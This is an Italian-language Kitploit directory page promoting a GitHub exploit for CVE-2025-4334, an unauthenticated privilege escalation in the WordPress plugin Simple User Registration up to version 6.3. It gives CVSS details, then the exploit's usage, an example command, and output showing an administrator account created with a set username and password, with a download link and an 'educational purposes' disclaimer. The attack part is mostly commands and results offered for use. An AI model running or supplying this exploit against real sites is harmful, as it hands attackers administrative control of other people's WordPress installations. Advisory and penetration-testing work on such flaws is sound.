Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-4334 — Simple User Registration <= 6.3 - Escalation dei Privilegi non Autenticata | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-4334
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-4334

CVE-2025-4334

Simple User Registration <= 6.3 - Escalation dei Privilegi non Autenticata

Vedi Repository
7331 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔓 Simple User Registration <= 6.3 - Escalata dei Privilegi Non Autenticata

📄 Descrizione

Il plugin Simple User Registration per WordPress è vulnerabile all'Escalata dei Privilegi in tutte le versioni fino alla 6.3 inclusa.
Ciò è dovuto a insufficienti restrizioni sui metadati utente che possono essere forniti durante la registrazione.
Questo consente a attaccanti non autenticati di registrarsi come amministratori.


🛡️ Dettagli della Vulnerabilità

  • Tipo: Gestione Impropria dei Privilegi
  • CVE: CVE-2025-4334
  • Punteggio CVSS: 9.8 (Critico)
  • Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Pubblicato Pubblicamente: 25 Giugno 2025
  • Ultimo Aggiornamento: 26 Giugno 2025

🛠️ Script di Exploit

L'exploit automatizza l'escalata dei privilegi tramite invio di modulo utilizzando un nonce estratto, un ID del modulo e un referer.

⚙️ Utilizzo

root@kitploit:~
python CVE-2025-4334.py -h
root@kitploit:~
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Escalata dei Privilegi Non Autenticata - by Khaled Alenazi (Nxploited)

opzioni:
  -h, --help     mostra questo messaggio di aiuto ed esce
  -u, --url URL  URL base di WordPress (es. http://localhost/wordpress/)
  --form FORM    URL completo della pagina che contiene il modulo di registrazione

🌐 Spiegazione degli URL

  • -u → Installazione base di WordPress (es. http://localhost/wordpress/)
  • --form → URL completo del modulo di registrazione vulnerabile (es. http://localhost/wpr/default-registration/)

🧪 Esempio

root@kitploit:~
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/

✅ Risultato

root@kitploit:~
[i] Nonce estratto   : ffcf0140a8
[i] ID Modulo estratto : 76
[i] Percorso Referer : /wpr/default-registration/
[i] Codice Risposta HTTP : 200
[i] Risposta Server   : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploit Riuscito
[+] Nome Utente   : Nxploitedadmin
[+] Nome          : Nxploitedadmin
[+] Cognome       : Nxploitedadmin
[+] Email         : [email protected]
[+] Password      : nxp1234
[+] Ruolo         : administrator

Exploit By : Khaled_alenazi (Nxploited)

⚠️ Disclaimer

Questo script è fornito esclusivamente a scopo educativo e di ricerca.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.


By: Khaled_alenazi (Nxploited)

Scarica lo strumento